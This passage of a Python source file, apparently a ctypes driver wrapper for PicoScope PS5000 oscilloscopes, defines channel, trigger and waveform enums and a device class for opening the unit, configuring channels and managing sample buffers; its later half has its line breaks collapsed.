    p1 = 0x81
    p2 = 0x82
    p3 = 0x83
    map = (p0, p1, p2, p3)
    labels = {p0: "p0", p1: "p1", p2: "p2", p3: "p3"}


class PortState(dict2class):
    """ Object describing state of the digital port """
    def __init__(self):
        self.enabled = False
        self.level = 0


class PortBits(dict2class):
    """ Bits numbers used in MSO collections """
    b0 = 0
    b1 = 1
    b2 = 2
    b3 = 3
    b4 = 4
    b5 = 5
    b6 = 6
    b7 = 7
    b8 = 8
    b9 = 9
    b10 = 10
    b11 = 11
    b12 = 12
    b13 = 13
    b14 = 14
    b15 = 15
    b16 = 16
    b17 = 17
    b18 = 18
    b19 = 19
    b20 = 20
    b21 = 21
    b22 = 22
    b23 = 23
    b24 = 24
    b25 = 25
    b26 = 26
    b27 = 27
    b28 = 28
    b29 = 29
    b30 = 30
    b31 = 31
    # BUGFIX: the first row previously read (b0, b1, b3, b3, ...), omitting
    # b2 and listing b3 twice; every other row is consecutive and labels
    # defines key 2 as "b2", so this was a typo.
    map = ((b0, b1, b2, b3, b4, b5, b6, b7),
           (b8, b9, b10, b11, b12, b13, b14, b15),
           (b16, b17, b18, b19, b20, b21, b22, b23),
           (b24, b25, b26, b27, b28, b29, b30, b31))
    # Same fix applied to the per-port lookup below.
    portmap = {
        Ports.p0: (b0, b1, b2, b3, b4, b5, b6, b7),
        Ports.p1: (b8, b9, b10, b11, b12, b13, b14, b15),
        Ports.p2: (b16, b17, b18, b19, b20, b21, b22, b23),
        Ports.p3: (b24, b25, b26, b27, b28, b29, b30, b31)
    }
    labels = {0: "b0", 1: "b1", 2: "b2", 3: "b3", 4: "b4", 5: "b5",
              6: "b6", 7: "b7", 8: "b8", 9: "b9", 10: "b10", 11: "b11",
              12: "b12", 13: "b13", 14: "b14", 15: "b15", 16: "b16",
              17: "b17", 18: "b18", 19: "b19", 20: "b20", 21: "b21",
              22: "b22", 23: "b23", 24: "b24", 25: "b25", 26: "b26",
              27: "b27", 28: "b28", 29: "b29", 30: "b30", 31: "b31"}


class Ranges(dict2class):
    """ Universal class with channel ranges """
    r10mv = 0
    r20mv = 1
    r50mv = 2
    r100mv = 3
    r200mv = 4
    r500mv = 5
    r1v = 6
    r2v = 7
    r5v = 8
    r10v = 9
    r20v = 10
    r50v = 11
    r100v = 12
    r200v = 13
    r400v = 14
    map = (r10mv, r20mv, r50mv, r100mv, r200mv, r500mv, r1v, r2v, r5v,
           r10v, r20v, r50v, r100v, r200v, r400v)
    # labels use the "\261" (plus/minus) glyph; ascii_labels spell it out.
    labels = {r10mv: "\26110mV", r20mv: "\26120mV", r50mv: "\26150mV",
              r100mv: "\261100mV", r200mv: "\261200mV", r500mv: "\261500mV",
              r1v: "\2611V", r2v: "\2612V", r5v: "\2615V", r10v: "\26110V",
              r20v: "\26120V", r50v: "\26150V", r100v: "\261100V",
              r200v: "\261200V", r400v: "\261400V"}
    values = {r10mv: 0.01, r20mv: 0.02, r50mv: 0.05, r100mv: 0.1,
              r200mv: 0.2, r500mv: 0.5, r1v: 1.0, r2v: 2.0, r5v: 5.0,
              r10v: 10.0, r20v: 20.0, r50v: 50.0, r100v: 100.0,
              r200v: 200.0, r400v: 400.0}
    ascii_labels = {r10mv: "+/-10mV", r20mv: "+/-20mV", r50mv: "+/-50mV",
                    r100mv: "+/-100mV", r200mv: "+/-200mV",
                    r500mv: "+/-500mV", r1v: "+/-1V", r2v: "+/-2V",
                    r5v: "+/-5V", r10v: "+/-10V", r20v: "+/-20V",
                    r50v: "+/-50V", r100v: "+/-100V", r200v: "+/-200V",
                    r400v: "+/-400V"}


class RatioModes(dict2class):
    """ Collection of reduction modes """
    raw = 0
    none = raw
    agg = 1
    aggregate = agg
    dec = 2
    decimate = dec
    avg = 4
    average = avg
    map = (raw, agg, dec, avg)
    labels = {raw: "raw", agg: "agg", dec: "dec", avg: "avg"}

    @staticmethod
    def mode2dict(mode):
        """ Returns dict of matched modes
        :param mode: OR-ed modes selection
        :type mode: int
        :return: dict of valid labels with enum values
        :rtype: dict
        """
        r = {}
        for m in RatioModes.labels:
            if mode == m:
                # exact match (covers raw == 0, which & cannot detect)
                return {RatioModes.labels[m]: m}
            if mode & m > 0:
                r[RatioModes.labels[m]] = m
        return r

    @staticmethod
    def isvalid(mode):
        """ Quick test, whether provided mode is a valid one
        :param mode: OR-ed modes selection to validate
        :type mode: int
        :return: if valid
        :rtype: bool
        """
        return len(RatioModes.mode2dict(mode)) > 0

    @staticmethod
    def issingle(mode):
        # True when mode is exactly one mode (not an OR-ed combination).
        return mode in RatioModes.labels.keys()


class BufferInfo(dict2class):
    """ Type specifier for Block Buffer structure """
    def __init__(self):
        # guards concurrent access to the buffer from collection threads
        self.access_lock = Lock()


class ThresholdModes(dict2class):
    """ Simple trigger threshold collection """
    lvl = 0
    level = lvl
    win = 1
    window = win
    map = (lvl, win)
    labels = {lvl: "level", win: "window"}


class SweepTypes(dict2class):
    """ Collection of Sweep Types in Simple Signal Generator """
    up = 0
    down = 1
    updown = 2
    downup = 3
    map = (up, down, updown, downup)
    labels = {up: "up", down: "down", updown: "updown", downup: "downup"}


class WaveTypes(dict2class):
    """ Collection of Waveform Types for Simple Signal Generator """
    sine = 0
    square = 1
    triangle = 2
    ramp_up = 3
    ramp_down = 4
    sinc = 5
    gaussian = 6
    half_sine = 7
    dc = 8
    map = (sine, square, triangle, ramp_up, ramp_down, sinc, gaussian,
           half_sine, dc)
    labels = {sine: "sine", square: "square", triangle: "triangle",
              ramp_up: "ramp up", ramp_down: "ramp down", sinc: "sinc",
              gaussian: "gaussian", half_sine: "half sine", dc: "DC"}


class SigExtra(dict2class):
    """ Collection of additionall parameters for Advanced Signal Generator """
    off = 0
    white_noise = 1
    wnoise = white_noise
    prbs = 2
    map = (off, wnoise, prbs)
    labels = {off: "off", wnoise: "white noise", prbs: "PRBS"}


class SigTriggerTypes(dict2class):
    """ Collection of Trigger Types for Advanced Signal Generator """
    rising = 0
    falling = 1
    gate_high = 2
    gate_low = 3
    map = (rising, falling, gate_high, gate_low)
    labels = {rising: "rising", falling: "falling",
              gate_high: "gate high", gate_low: "gate low"}


class SigTriggerSource(dict2class):
    """ Collection of Trigger Sources for Advanced Signal Generator """
    none = 0
    scope = 1
    aux = 2
    ext = 3
    soft = 4
    map = (none, scope, aux, ext, soft)
    labels = {none: "none", scope: "scope", aux: "aux in", ext: "ext in",
              soft: "software"}


class IndexModes(dict2class):
    """ Collection of Index Modes for AWG operation """
    single = 0
    dual = 1
    quad = 2
    map = (single, dual, quad)
    labels = {single: "single", dual: "dual", quad: "quad"}
    values = {single: 1, dual: 2, quad: 4}


class TriggerChannels(dict2class):
    """ Collection of channels used in triggering """
    A = Channels.A
    B = Channels.B
    C = Channels.C
    D = Channels.D
    Ext = 4
    Aux = 5
    map = (A, B, C, D, Ext, Aux)
    labels = {A: "A", B: "B", C: "C", D: "D", Ext: "EXT", Aux: "AUX"}


class ThresholdDirections(dict2class):
    """ Collection of Trigger Directions for Advanced Triggers """
    # level-mode and window-mode directions share enum values:
    # above/inside, below/outside, rising/enter, falling/exit.
    above = 0
    inside = above
    below = 1
    outside = below
    rising = 2
    enter = rising
    none = rising
    falling = 3
    exit = falling
    rising_or_falling = 4
    enter_or_exit = rising_or_falling
    above_lower = 5
    below_lower = 6
    rising_lower = 7
    falling_lower = 8
    positive_runt = 9
    negative_runt = 10
    map = (above, below, rising, falling, rising_or_falling, above_lower,
           below_lower, rising_lower, falling_lower, positive_runt,
           negative_runt)
    simple = (above, below, rising, falling)
    labels = {above: "above", below: "below", rising: "rising",
              falling: "falling", rising_or_falling: "rise/fall",
              above_lower: "above/low", below_lower: "below/low",
              rising_lower: "rise/low", falling_lower: "fall/low",
              positive_runt: "pos runt", negative_runt: "neg runt"}


class DigitalDirections(dict2class):
    """ Collection of Trigger Directions for Digital Triggers """
    dont_care = 0
    low = 1
    high = 2
    rising = 3
    falling = 4
    rising_or_falling = 5
    map = (dont_care, low, high, rising, falling, rising_or_falling)
    labels = {dont_care: "don't care", low: "low", high: "high",
              rising: "rising", falling: "falling",
              rising_or_falling: "rise/fall"}


class TriggerChannelDirections(dict2class):
    """ container for channel directions """
    def __init__(self, *args, **kwargs):
        # one attribute per trigger channel label ("A".."D", "EXT", "AUX"),
        # each defaulting to ThresholdDirections.none
        for c in TriggerChannels.map:
            self.__dict__[TriggerChannels.labels[c]] = ThresholdDirections.none
        self.update(*args, **kwargs)


class TriggerState(dict2class):
    """ Collection of Trigger states for Advanced Triggers """
    dont_care = 0
    true = 1
    false = 2
    map = (dont_care, true, false)
    labels = {dont_care: "don't care", true: "true", false: "false"}


class TriggerConditionsStruct(Structure):
    """ CType specifier for Trigger Conditions """
    _fields_ = [
        ("chA", c_int32),
        ("chB", c_int32),
        ("chC", c_int32),
        ("chD", c_int32),
        ("ext", c_int32),
        ("aux", c_int32),
        ("pwq", c_int32),
        ("dig", c_int32),
    ]
    _pack_ = 1


class TriggerConditions(dict2class):
    """ Collection of Trigger Conditions for Advanced Triggering """
    chA = TriggerState.dont_care
    chB = TriggerState.dont_care
    chC = TriggerState.dont_care
    chD = TriggerState.dont_care
    ext = TriggerState.dont_care
    aux = TriggerState.dont_care
    pwq = TriggerState.dont_care
    dig = TriggerState.dont_care

    def __init__(self, *args, **kwargs):
        self.update(*args, **kwargs)

    def to_struct(self):
        # pack into the ctypes layout expected by the driver
        return TriggerConditionsStruct(self.chA, self.chB, self.chC,
                                       self.chD, self.ext, self.aux,
                                       self.pwq, self.dig)

    def is_set(self):
        # True when at least one condition differs from dont_care
        return len([c for c in (self.chA, self.chB, self.chC, self.chD,
                                self.ext, self.aux, self.pwq, self.dig)
                    if c != TriggerState.dont_care]) > 0


class PwqConditionsStruct(Structure):
    """ CType specifier for Pulse Width Qualifier Conditions """
    _fields_ = [
        ("chA", c_int32),
        ("chB", c_int32),
        ("chC", c_int32),
        ("chD", c_int32),
        ("ext", c_int32),
        ("aux", c_int32),
        ("dig", c_int32),
    ]
    _pack_ = 1


class PwqConditions(dict2class):
    """ Collection of Pulse Width Qualifier Conditions """
    chA = TriggerState.dont_care
    chB = TriggerState.dont_care
    chC = TriggerState.dont_care
    chD = TriggerState.dont_care
    ext = TriggerState.dont_care
    aux = TriggerState.dont_care
    dig = TriggerState.dont_care

    def __init__(self, *args, **kwargs):
        self.update(*args, **kwargs)

    def to_struct(self):
        # pack into the ctypes layout expected by the driver
        return PwqConditionsStruct(self.chA, self.chB, self.chC, self.chD,
                                   self.ext, self.aux, self.dig)

    def is_set(self):
        # True when at least one condition differs from dont_care
        return len([c for c in (self.chA, self.chB, self.chC, self.chD,
                                self.ext, self.aux, self.dig)
                    if c != TriggerState.dont_care]) > 0


class PwqTypes(dict2class):
    """ Collection of Pulse Width Qualifier types """
    none = 0
    less_than = 1
    lt = less_than
    greater_than = 2
    gt = greater_than
    in_range = 3
    inside = in_range
    out_of_range = 4
    outside = out_of_range
    map = (none, lt, gt, inside, outside)
    labels = {none: "None", lt: "Less Than", gt: "Greater Than",
              inside: "Inside", outside: "Outside"}


class DigitalChannelDirectionStruct(Structure):
    """ CType specifier for Digital triggers """
    _fields_ = [
        ("portbit", c_int32),
        ("direction", c_int32)
    ]
    _pack_ = 1


class TriggerChannelPropertiesStruct(Structure):
    """ CType specifier for Trigger Channel Properties in Advanced Triggers """
    _fields_ = [
        ("threshUpperADC", c_int16),
        ("threshUpperHys", c_uint16),
        ("threshLowerADC", c_int16),
        ("threshLowerHys", c_uint16),
        ("channel", c_int32),
        ("threshMode", c_int32)
    ]
    _pack_ = 1


class TriggerChannelProperties(dict2class):
    """ Object describing single Channel Trigger Properties in Advanced Triggers """
    # NOTE(review): threshUpperADC defaults to a float (0.2) while the
    # struct field is c_int16, and 32767 sits in the hysteresis slot --
    # these defaults look swapped/typo'd; confirm before relying on them.
    threshUpperADC = 0.2
    threshUpperHys = 32767
    threshLowerADC = -32767
    threshLowerHys = 0
    threshMode = ThresholdModes.level
    direction = ThresholdDirections.none

    def __init__(self, channel, *args, **kwargs):
        self.channel = channel
        # NOTE(review): self is passed to update() here, unlike the other
        # condition classes in this module; confirm dict2class.update's
        # expected signature.
        self.update(self, *args, **kwargs)

    def to_struct(self):
        """ Translate object to ctypes structure
        :return: object
        """
        return TriggerChannelPropertiesStruct(self.threshUpperADC,
                                              self.threshUpperHys,
                                              self.threshLowerADC,
                                              self.threshLowerHys,
                                              self.channel,
                                              self.threshMode)


class ETSModes(dict2class):
    """ Collection of ETS modes """
    off = 0
    fast = 1
    slow = 2
    max = 3
    map = (off, fast, slow, max)
    labels = {off: "off", fast: "fast", slow: "slow", max: "max"}


class TimeUnits(dict2class):
    """ Collection of Time Units used in Timebase calculations """
    fs = 0
    ps = 1
    ns = 2
    us = 3
    ms = 4
    s = 5
    max = 6
    map = (fs, ps, ns, us, ms, s)
labels = {fs: "fs", ps: "ps", ns: "ns", us: "μs", ms: "ms", s: "s"} ascii_labels = {fs: "fs", ps: "ps", ns: "ns", us: "us", ms: "ms", s: "s"} @staticmethod def nanofactors(unit): """ Returns power factor to bring interval value to nanoseconds """ factor = -6 for u in TimeUnits.map: if u != unit: factor += 3 else: break return factor @staticmethod def secfactors(unit): """ Returns power factor to bring interval value to seconds """ factor = 15 for u in TimeUnits.map: if u != unit: factor -= 3 else: break return factor @staticmethod def multiplier(f, t): """ Returns multiplier for bringing time value from one unit to another :param f: from units enum :type f: int :param t: to units enum :type t: int :return: multiplier :rtype : float """ if f not in TimeUnits.map or t not in TimeUnits.map: return 0 if f > t: return 1.0 * pow(10, (f - t) * 3) elif f < t: return 1.0 / pow(10, (t - f) * 3) else: return 1.0 ldlib = object() class PS5000Device(object): def __init__(self, libobj): if not hasattr(self, "m"): self.m = sys.modules[__name__] raise NotImplementedError("Driver Module reference not set") self._handle = 0 self._chandle = c_int16(0) self._channel_set = {} self._port_set = {} self.info = self.m.UnitInfo() self.trigger = False self.trigg_source = self.m.Channels.A self.trigg_threshold = 0.0 self.trigg_direction = self.m.ThresholdDirections.rising self.trigg_ratio = 0.5 self.trigg_wait = 0 self.trigger_conditions = () self.trigger_analog = () self.trigger_digital = () self.pwq_conditions = () self.pwq_direction = self.m.ThresholdDirections.rising self.pwq_lower = 0 self.pwq_upper = 0 self.pwq_type = self.m.PwqTypes.none self._ets = dict2class() self._ets.mode = self.m.ETSModes.off self._ets.last = self.m.ETSModes.off self._ets.cycles = 0 self._ets.interleaves = 0 self._ets.picos = 0.0 self._ets.status = pico_num("PICO_OK") self._ets.time = None self._segments = 0 self._start_segment = None self._stop_segment = None self._bulk_indexes = () self._collect_indexes = None 
self._collect_event = Event() if self._collect_event.is_set(): self._collect_event.clear() self._collect_cb_type = None self._collect_cb_func = None self._tape = None self._records = None self._leavers = None self._recording_thread = None self._recording_lock = Lock() if self._recording_lock.acquire(False): self._recording_lock.release() self._recording_event = Event() if self._recording_event.is_set(): self._recording_event.clear() self._async_lock = Lock() if self._async_lock.acquire(False): self._async_lock.release() self._async_event = Event() if self._async_event.is_set(): self._async_event.clear() self._async_cb_type = None self._async_cb_func = None self._overlapped_samples = c_uint32(0) self._overlapped_ov = None self.last_error = None global ldlib ldlib = libobj def open_unit(self, serial=None): """ Opens unit :param serial: string specifying device serial and batch :type serial: string :returns: status of the call :rtype: int """ """ Only one unit allowed per instance """ if self._handle > 0: """ same will occur if 64 devices are opened... 
unlikely""" return pico_num("PICO_MAX_UNITS_OPENED") try: status = ldlib.OpenUnit(byref(self._chandle), c_char_p(serial)) except AttributeError: return pico_num("PICO_NOT_FOUND") self._handle = self._chandle.value """ Read INFO from device, populate self.info """ if status == pico_num("PICO_OK"): self.info.handle = self._handle status = self._set_info() if status == pico_num("PICO_OK"): """ Set device defaults """ status = self.set_defaults() return status def _set_info(self): """ Pulls information from the driver to info class :returns: status of subsequent calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") for tag in ("DRIVER_VERSION", "USB_VERSION", "HARDWARE_VERSION", "VARIANT_INFO", "BATCH_AND_SERIAL", "CAL_DATE", "FIRMWARE_VERSION_1", "FIRMWARE_VERSION_2"): self.info[tag.lower()] = None line = create_string_buffer("\0", MAX_INFO_LEN) required = c_int16() if ("PICO_%s" % tag) in PICO_INFO: status = ldlib.GetUnitInfo(self._chandle, line, c_int16(MAX_INFO_LEN), byref(required), c_uint32(PICO_INFO["PICO_%s" % tag])) if status == pico_num("PICO_OK"): self.info[tag.lower()] = line.value if self.info.variant_info is not None: status = self._set_variant_info() else: status = pico_num("PICO_INFO_UNAVAILABLE") if status == pico_num("PICO_OK"): status = self._set_memory_info() if status != pico_num("PICO_OK"): return status self.info.channel_ranges = dict2class() inner = False outer = False max_offset = c_float(0) min_offset = c_float(0) for i in self.m.Ranges.map: if not inner and i == self.info.min_range: inner = True if not outer and i > self.info.max_range: outer = True if not inner or outer: continue r = dict2class() r.label = self.m.Ranges.labels[i] r.value = self.m.Ranges.values[i] r.ascii_label = self.m.Ranges.ascii_labels[i] r.enum = i if hasattr(ldlib, "GetAnalogueOffset"): # dc status = ldlib.GetAnalogueOffset(self._chandle, r.enum, self.m.Couplings.dc, byref(max_offset), byref(min_offset)) if status == pico_num("PICO_OK"): 
r.max_dc_offset = max_offset.value r.min_dc_offset = min_offset.value else: r.max_dc_offset = None r.min_dc_offset = None # ac status = ldlib.GetAnalogueOffset(self._chandle, r.enum, self.m.Couplings.ac, byref(max_offset), byref(min_offset)) if status == pico_num("PICO_OK"): r.max_ac_offset = max_offset.value r.min_ac_offset = min_offset.value else: r.max_ac_offset = None r.min_ac_offset = None else: r.max_dc_offset = None r.min_dc_offset = None r.max_ac_offset = None r.min_ac_offset = None self.info.channel_ranges[i] = r if hasattr(ldlib, "MinimumValue") and hasattr(ldlib, "MaximumValue"): limit = c_int16(0) status = ldlib.MinimumValue(self._chandle, byref(limit)) if status == pico_num("PICO_OK"): self.info.min_adc = limit.value else: self.info.min_adc = None status = ldlib.MaximumValue(self._chandle, byref(limit)) if status == pico_num("PICO_OK"): self.info.max_adc = limit.value else: self.info.max_adc = None else: self.info.min_adc = -32512 self.info.max_adc = 32512 if hasattr(ldlib, "SigGenArbitraryMinMaxValues"): minv = c_int16(0) maxv = c_int16(0) mins = c_uint32(0) maxs = c_uint32(0) status = ldlib.SigGenArbitraryMinMaxValues(self._chandle, byref(minv), byref(maxv), byref(mins), byref(maxs)) if status == pico_num("PICO_OK"): self.info.awg_min = minv.value self.info.awg_max = maxv.value self.info.awg_size = maxs.value else: self.info.awg_min = -32767 self.info.awg_max = 32768 return pico_num("PICO_OK") def _set_memory_info(self): """ Sets initial memory setup :returns: status of subsequent calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") self._buffers = {} self._segments = 1 mem = c_int32() status = self._memory_segments(self._segments, byref(mem)) self.info.memory = mem.value self.info.memps = mem.value if status == pico_num("PICO_OK"): seg = c_uint32() status = ldlib.GetMaxSegments(self._chandle, byref(seg)) self.info.max_segments = seg.value return status def _set_variant_info(self): """ Sets device variant specific 
properties :returns: status of subsequent calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if not hasattr(self.info, "variant_info") or self.info.variant_info is None: return pico_num("PICO_INFO_UNAVAILABLE") """ each subclass should have its own override """ return pico_num("PICO_INFO_UNAVAILABLE") def set_defaults(self): """ Sets device into default state Each subclass should have its own implementation :returns: status of subsequent calls :rtype: int """ return pico_num("PICO_INFO_UNAVAILABLE") def flash_led(self, count=1): """ Flashes device's LED count times :param count: number of flashes :type count: int :returns: status of subsequent calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") return ldlib.FlashLed(self._chandle, c_int16(count)) def set_channel(self, channel, state): """ Sets device's selected channel into requested state :param channel: channel number as in Channels :type channel: int :param state: ChannelState object with desired setup :type state: ChannelState :returns: status of subsequent calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if not isinstance(state, self.m.ChannelState): return pico_num("PICO_INVALID_PARAMETER") status = ldlib.SetChannel(self._chandle, c_int32(channel), c_int16(state.enabled), c_int32(state.coupling), c_int32(state.range), c_float(state.offset)) if status == pico_num("PICO_OK"): state.overvoltaged = False self._channel_set[channel] = deepcopy(state) return status def get_channel_state(self, channel): """ Returns current ChannelState object describing channel :param channel: channel number as in Channels :type channel: int :returns: state of the channel :rtype: ChannelState """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), None if channel not in self._channel_set.keys(): return pico_num("PICO_INVALID_CHANNEL"), None return pico_num("PICO_OK"), deepcopy(self._channel_set[channel]) def 
is_channel_overvoltaged(self, channel): """ Checks if channel is overvoltaged after latest collection Will return False when parameters check fails. :param channel: channel number as in Channels :type channel: int :returns: overvoltage check result :rtype: bool """ if self._handle <= 0 or channel not in self._channel_set.keys(): return False return self._channel_set[channel].overvoltaged def increase_channel_range(self, channel, step=1): """ Increase channel range setting by number of steps. If step <= 0 - set maximum available range :param channel: channel number as in Channels :type channel: int :param step: number of ranges to increase by :rtype step: int :returns: status of subsequent calls :rtype: int """ status, state = self.get_channel_state(channel) if status != pico_num("PICO_OK"): return status if state is None: return pico_num("PICO_INVALID_STATE") if state.range == self.info.max_range: return pico_num("PICO_OK") if step <= 0: state.range = self.info.max_range else: for r in self.m.Ranges.map: if r > state.range: step -= 1 if step == 0 or r == self.info.max_range: break else: r = None state.range = r return self.set_channel(channel, state) def decrease_channel_range(self, channel, step=1): """ Decrease channel range setting by number of steps. 
If step <= 0 - set minimum available range :param channel: channel number as in Channels :type channel: int :param step: number of ranges to decrease by :rtype step: int :returns: status of subsequent calls :rtype: int """ status, state = self.get_channel_state(channel) if status != pico_num("PICO_OK"): return status if state is None: return pico_num("PICO_INVALID_STATE") if state.range == self.info.min_range: return pico_num("PICO_OK") if step <= 0: state.range = self.info.min_range else: rangelist = self.m.Ranges.map rangelist.reverse() for r in rangelist: if r < state.range: step -= 1 if step == 0 or r == self.info.min_range: break else: r = None state.range = r return self.set_channel(channel, state) def set_digital_port(self, port, state): """ Sets properties of digital ports :param port: Port enum as in Ports :type port: int :param state: desired PortState of requested port :type state: PortState :returns: status of subsequent calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if self.info.num_ports == 0: return pico_num("PICO_NOT_SUPPORTED_BY_THIS_DEVICE") if not isinstance(state, self.m.PortState): return pico_num("PICO_INVALID_PARAMETER") adc_level = int(state.level / MAX_LOGIC_VOLTS * MAX_LOGIC_LEVEL) adc_level = MAX_LOGIC_LEVEL if adc_level > MAX_LOGIC_LEVEL \ else MIN_LOGIC_LEVEL if adc_level < MIN_LOGIC_LEVEL \ else adc_level status = ldlib.SetDigitalPort(self._chandle, c_int32(port), c_int16(state.enabled), c_int16(adc_level)) if status == pico_num("PICO_OK"): self._port_set[port] = deepcopy(state) return status def get_digital_port_state(self, port): """ Returns current PortState object describing port :param port: portn enum as in Ports :type port: int :returns: state of the channel :rtype: PortState """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), None if self.info.num_ports == 0: return pico_num("PICO_NOT_SUPPORTED_BY_THIS_DEVICE"), None if port not in self._port_set: return 
pico_num("PICO_INVALID_DIGITAL_PORT"), None return pico_num("PICO_OK"), deepcopy(self._port_set[port]) def get_basic_interval(self, timebase): """ Return Device interval for given timebase :param timebase: timebase value :type timebase: int :returns: status of the calls, interval value :rtype: int, float """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), None interval = c_float() status = self._get_timebase(timebase=timebase, samples=1, ref_interval=byref(interval), oversample=0, ref_maxsamples=None, segment=0) return status, interval.value def _get_timebase(self, timebase, samples, ref_interval, oversample, ref_maxsamples, segment): return ldlib.GetTimebase(self._chandle, c_uint32(timebase), c_int32(samples), ref_interval, c_int16(oversample), ref_maxsamples, c_uint32(segment)) def set_memory_segments(self, segments): """ Sets number of memory segments and returns number of available samples per segment Will release all allocated buffers. :param segments: number of segments to set up :type segments: int :returns status of the calls, number of available samples per segment :rtype: int, int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), 0 """ Do not break data collection if its ongoing """ for e in (self._collect_event, self._recording_event, self._async_event): if e is not None and e.is_set(): return pico_num("PICO_BUSY"), None if segments > self.info.max_segments: return pico_num("PICO_TOO_MANY_SEGMENTS"), 0 if segments == 0: return pico_num("PICO_NOT_ENOUGH_SEGMENTS"), 0 mem = c_int32() status = self._memory_segments(segments, byref(mem)) if status == pico_num("PICO_OK"): self._segments = segments self.info.memps = mem.value return status, mem.value return status, 0 def _memory_segments(self, segments, ref_mem): return ldlib.MemorySegments(self._chandle, c_uint32(segments), ref_mem) def locate_buffer(self, channel, samples, segment, mode, downsample, index=None): """ Locates/Creates internal buffer and returns stack index of it. 
:param channel: channel or port as in Channels or Ports :type channel: int :param samples: desired length of the buffer, after data reduction :type samples: int :param segment: corresponding memory segment number for the buffer :type segment: int :param mode: unmasked aka single data reduction mode as in RatioModes :type mode: int :param downsample: data reduction ratio :type downsample: int :param index: optional desired index number, if setting match existing - ignored :type index: int :returns: status of the calls, assigned index number :rtype: tuple(int, int) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), None """ validate channels """ if channel not in (self._channel_set.keys() + self._port_set.keys()): if channel < self.m.Ports.p0: return pico_num("PICO_INVALID_CHANNEL"), None else: return pico_num("PICO_INVALID_DIGITAL_PORT"), None """ validate segments """ if segment > self._segments: return pico_num("PICO_SEGMENT_OUT_OF_RANGE"), None """ validate mode """ if not self.m.RatioModes.issingle(mode): return pico_num("PICO_RATIO_MODE_NOT_SUPPORTED"), None """ check if buffer of same spec / index exists """ save_index = None if index is not None: if index in self._buffers: return self._reshape_buffer(index, channel, samples, segment, mode, downsample), index else: save_index = index """ check if buffer of given channel, segment and mode exists """ for index in self._buffers.keys(): if self._buffers[index].channel == channel \ and self._buffers[index].segment == segment and self._buffers[index].mode == mode: if save_index is not None: self._buffers[save_index] = self._buffers.pop(index) index = save_index return self._reshape_buffer(index, channel, samples, segment, mode, downsample), index """ allocate/recycle new index """ if save_index is None: index = 0 for i in self._buffers.keys(): if i == index: index += 1 else: break else: index = save_index """ allocate new buffer """ self._buffers[index] = self.m.BufferInfo() with 
self._buffers[index].access_lock: self._buffers[index].inuse = Lock() self._buffers[index].data = None self._buffers[index].data_min = None self._buffers[index].channel = channel self._buffers[index].samples = samples self._buffers[index].segment = segment self._buffers[index].mode = mode self._buffers[index].downsample = downsample self._buffers[index].last_interval = None self._buffers[index].last_timebase = None self._buffers[index].real_interval = None return pico_num("PICO_OK"), index def locate_buffers(self, channel, samples, start_segment, stop_segment, mode, downsample): """ Locates/Creates internal buffers and returns stack index of it. :param channel: channel or port as in Channels or Ports :type channel: int :param samples: desired length of the buffer, after data reduction :type samples: int :param start_segment: memory segment number from :type start_segment: int :param stop_segment: memory segment number to :type stop_segment: int :param mode: unmasked aka single data reduction mode as in RatioModes :type mode: int :param downsample: data reduction ratio :type downsample: int :returns: status of the calls, assigned index numbers in the form of tuple :rtype: tuple(int, tuple()) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), () if start_segment > self._segments or stop_segment >= self._segments: return pico_num("PICO_SEGMENT_OUT_OF_RANGE"), () if start_segment > stop_segment: segments = range(start_segment, self._segments) + range(0, stop_segment + 1) else: segments = range(start_segment, stop_segment + 1) indexes = () for segment in segments: status, number = self.locate_buffer(channel, samples, segment, mode, downsample) if status != pico_num("PICO_OK"): return status, indexes indexes += (number,) return pico_num("PICO_OK"), indexes def _reshape_buffer(self, index, channel, samples, segment, mode, downsample): """ Changes buffer properties to match specified """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if index 
not in self._buffers: return pico_num("PICO_INVALID_BUFFER") with self._buffers[index].access_lock: """ check if there is really anything to change """ if self._buffers[index].channel == channel \ and self._buffers[index].samples == samples \ and self._buffers[index].segment == segment \ and self._buffers[index].mode == mode \ and (mode == self.m.RatioModes.none or self._buffers[index].downsample == downsample): return pico_num("PICO_OK") """ resize buffers if needed """ if self._buffers[index].samples != samples: self._buffers[index].data = None self._buffers[index].data_min = None self._buffers[index].channel = channel self._buffers[index].samples = samples self._buffers[index].segment = segment self._buffers[index].mode = mode self._buffers[index].downsample = downsample return pico_num("PICO_OK") def _set_data_buffers(self, line, buffer_max, buffer_min, bufflen, segment, mode): return ldlib.SetDataBuffers(self._chandle, c_int32(line), buffer_max, buffer_min, c_int32(bufflen), c_uint32(segment), c_int32(mode)) def _lock_buffer(self, index): """ Tries to acquire internal lock for the buffer """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if index not in self._buffers: return pico_num("PICO_INVALID_BUFFER") try: with self._buffers[index].access_lock: if not self._buffers[index].inuse.acquire(False): return pico_num("PICO_BUSY") except: return pico_num("PICO_BUSY") return pico_num("PICO_OK") def unlock_buffer(self, index): """ Unlocks previously locked buffer :param index: buffer index number :type index: int :returns: status of the calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if index not in self._buffers: return pico_num("PICO_INVALID_BUFFER") try: with self._buffers[index].access_lock: self._buffers[index].inuse.release() except: return pico_num("PICO_OK") return pico_num("PICO_OK") def is_buffer_locked(self, index): """ Tests if given buffer is locked :param index: buffer index number :type index: int 
